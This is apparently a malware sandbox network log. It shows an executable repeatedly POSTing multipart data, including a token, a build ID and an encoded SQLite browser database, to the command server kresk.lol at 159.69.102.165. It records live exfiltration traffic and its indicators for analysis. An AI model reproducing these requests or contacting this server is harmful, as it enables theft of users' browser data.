                                                                                                                                                                      2024-12-04 16:04:58 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 41 49 35 58 34 4f 5a 55 33 45 55 41 53 52 51 31 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 49 35 58 34 4f 5a 55 33 45 55 41 53 52 51 31 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 49 35 58 34 4f 5a 55 33 45 55 41 53 52 51 31 36 50 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------DBAI5X4OZU3EUASRQ16PContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------DBAI5X4OZU3EUASRQ16PContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------DBAI5X4OZU3EUASRQ16PCont
                                                                                                                                                                      2024-12-04 16:04:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:58 UTC16355OUTData Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54
                                                                                                                                                                      Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
                                                                                                                                                                      2024-12-04 16:05:00 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:05:00 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      20192.168.2.449786159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:04:59 UTC318OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----QIEU3EUA1N7YM7GV37Q1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 66001
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:04:59 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 51 49 45 55 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 51 49 45 55 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 51 49 45 55 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 31 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------QIEU3EUA1N7YM7GV37Q1Content-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------QIEU3EUA1N7YM7GV37Q1Content-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------QIEU3EUA1N7YM7GV37Q1Cont
                                                                                                                                                                      2024-12-04 16:04:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:04:59 UTC581OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:00 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:05:00 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:05:00 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      21192.168.2.449792159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:05:02 UTC319OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----K6FUAAS26F3E379HDBSJ
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 153381
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:05:02 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 36 46 55 41 41 53 32 36 46 33 45 33 37 39 48 44 42 53 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 36 46 55 41 41 53 32 36 46 33 45 33 37 39 48 44 42 53 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 36 46 55 41 41 53 32 36 46 33 45 33 37 39 48 44 42 53 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------K6FUAAS26F3E379HDBSJContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------K6FUAAS26F3E379HDBSJContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------K6FUAAS26F3E379HDBSJCont
                                                                                                                                                                      2024-12-04 16:05:02 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
